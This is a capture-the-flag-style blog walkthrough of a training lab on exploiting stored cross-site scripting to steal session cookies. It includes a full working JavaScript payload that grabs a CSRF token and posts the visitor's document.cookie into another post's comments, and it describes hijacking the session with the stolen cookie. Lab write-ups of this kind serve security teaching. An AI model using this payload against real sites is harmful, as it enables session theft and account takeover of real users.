In this post, we will be solving the lab: “Exploiting Cross-site Scripting to steal Cookies”.

XSS lab description

The statement indicates that there is a stored XSS vulnerability in the blog’s comment functionality. Additionally, it tells us that the website simulates a user visiting the comments section when a new comment is posted.

To solve this lab, we need to steal the session cookie of the user who visits the website and perform Session Hijacking.

This lab is somewhat special because there are two ways to solve it. The easiest is using Burp Collaborator, a feature that belongs to Burp Professional and is not available in the Community version.

In this case, we will go the more manual and complex route, doing some JavaScript scripting, and, of course, the route that doesn’t require you to have the paid version of Burp Suite.

That said, the first thing to do is access the lab:

Lab blog main page

Once we’re in, we can see several articles on the blog. So let’s access a random one:

List of available articles

View of post number 7

Once we’re in, we can see that this particular post is number 7. This information will be useful for the script we create.

At the bottom, we can find a comments section:

Blog comments form

So we’ll simply fill in the different fields. However, in the comment field, we inject simple HTML code to see if it gets interpreted:

Form with test payload

Comment submitted successfully

With the comment posted, we return to the post to see if the HTML code is interpreted:

HTML code interpreted in the comment

Indeed it is interpreted, so we can determine that the field is vulnerable.

Good, knowing this, it’s time to start preparing our attack, which will be executed entirely through JavaScript code.

The general idea is to generate JavaScript code that posts a comment with the cookie value of the user who visits the website.

If we create code like this, it would be awkward if, in order for us to see the comment that gets posted, we have to visit the very website where the malicious code is located, since this would cause us to execute the malicious code and therefore our cookie would also be sent in a comment. So to solve this aspect, we will post the malicious code in a comment on one article, but the code will be programmed to post comments on another article, so that we don’t have to visit the malicious website to see the cookie in the comments, and only have to visit the article where the comments with the cookies will appear.

Mini-reminder that the website simulates a user as soon as we post a comment.

Knowing all this and having a general idea of what we want to do, the first thing is to know what type of parameters are necessary to post a comment. To do this, we can see the request in Burp Suite:

HTTP request captured in Burp Suite

As we can see, the parameters needed to post a comment are:

  • csrf → CSRF Token found in the frontend source code.
  • postId → Post where we want to publish the comment.
  • comment → Well, the comment lol.
  • name → Name of the comment author.
  • email → Email of the comment author.
  • website → Comment Reference Website.

We’re really only interested in the first three parameters, the rest are irrelevant.

Speaking of the first one, the CSRF Token we already said is found in the application’s frontend:

CSRF token in HTML source code

Small note: its value is dynamic, so we need to automate obtaining its value in the JavaScript code. This can be achieved in this case as follows:

  • document.getElementsByName("csrf")[0].value;

The explanation of this statement is as follows: basically within the document (understood as a document, an HTML page) that we reference (document would be the one I’m in, this can vary to another name containing a document), we select the different elements that have "csrf" as a value in their "name" attribute.

The statement explained so far corresponds to:

  • document.getElementsByName("csrf")

Now, the output of this is an array with the different elements that meet what is indicated. In this case there is only one, so it will still be an array, but it will only have one value, so to refer to the CSRF Token element, we place the [0], since it is the first and only one in the array.

  • document.getElementsByName("csrf")[0]

Finally, already referencing the specific element, since what interests us is the value of its "value" attribute, we add it:

  • document.getElementsByName("csrf")[0].value;

With this, we would already be selecting the CSRF token value from the Frontend.

Good, now let’s determine the article where comments with cookies will be published:

List of available posts

View of post number 4

In this case, the post with id 4.

Now with all this, we can script our attack. The final and functional code is as follows:

<script>

	var csrf_value;

	/*Define the request that will obtain the CSRF token value*/

	var req = new XMLHttpRequest();
	req.onreadystatechange = function() {

	/*Define the code that will execute if the CSRF token GET request is successful*/

	if (req.readyState == 4 && req.status == 200)
	{
		/*From the request made, filter the response to obtain the CSRF token value*/

		var htmlPage = req.responseXML;
		csrf_value = htmlPage.getElementsByName("csrf")[0].value;

		/*Define the function that will execute when the first request is successful and we have the CSRF token value*/

		function postComment(csrf_value) {

			/*Define the different values belonging to the comment publication request*/
			var postId_value = '4';
			var comment_value = document.cookie;
			var name_value = 'PWNED';
			var email_value = 'hey@cagaste.bro';
			var website_value = 'http://deephacking.tech';

			var url = '/post/comment';

			/*Define and send the second request that the code will make, the request that publishes comments*/
			var req2 = new XMLHttpRequest();
			req2.open('POST', url, true);
			req2.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
			req2.send('csrf=' + csrf_value + '&postId=' + postId_value + '&comment=' + comment_value + '&name=' + name_value + '&email=' + email_value + '&website=' + website_value);

		}

		postComment(csrf_value);

	}

	};

	/*Finish defining the request that will obtain the CSRF token, it will be the first request made*/

	req.open("GET", "/post?postId=7");
	req.responseType = "document";
	req.send();

</script>

Mini code explanation: First, we make a request using XMLHttpRequest to /post?postId=7 to obtain the CSRF token value.

Once we have the token, we simply make a POST request using XMLHttpRequest again so that comments are published when this code is executed.

This script will be injected into post number 7, but the comments that will be published with the cookies will go to post number 4.

With all this ready, we will remove the line breaks from the code to avoid possible problems. To do this, we can use the CodeBeautify tool to remove line breaks:

CodeBeautify tool to remove line breaks

With the code copied, we go to article number 7 and paste the code in the comment field. Additionally, we fill in the other fields and publish the comment:

Malicious payload injection in the comment

Published comment confirmation

With the comment published, if we now go to article number 4 in the comments section we will find the following:

Stolen session cookie in the comments

A session cookie different from ours, so we will simply change the value of our session cookie to the value we found in the comment:

Original session cookie before the change

Session cookie replaced with the stolen one

If we refresh to see the possible changes in the session:

Session before hijacking

Session successfully hijacked

BOOM, we solve the lab! We managed to steal a user’s cookie and get into their session, all through just JavaScript code.

This way, we solve the lab:

Lab successfully completed

Share on X Share on LinkedIn Share on Telegram
Comment on Discord Visit the author page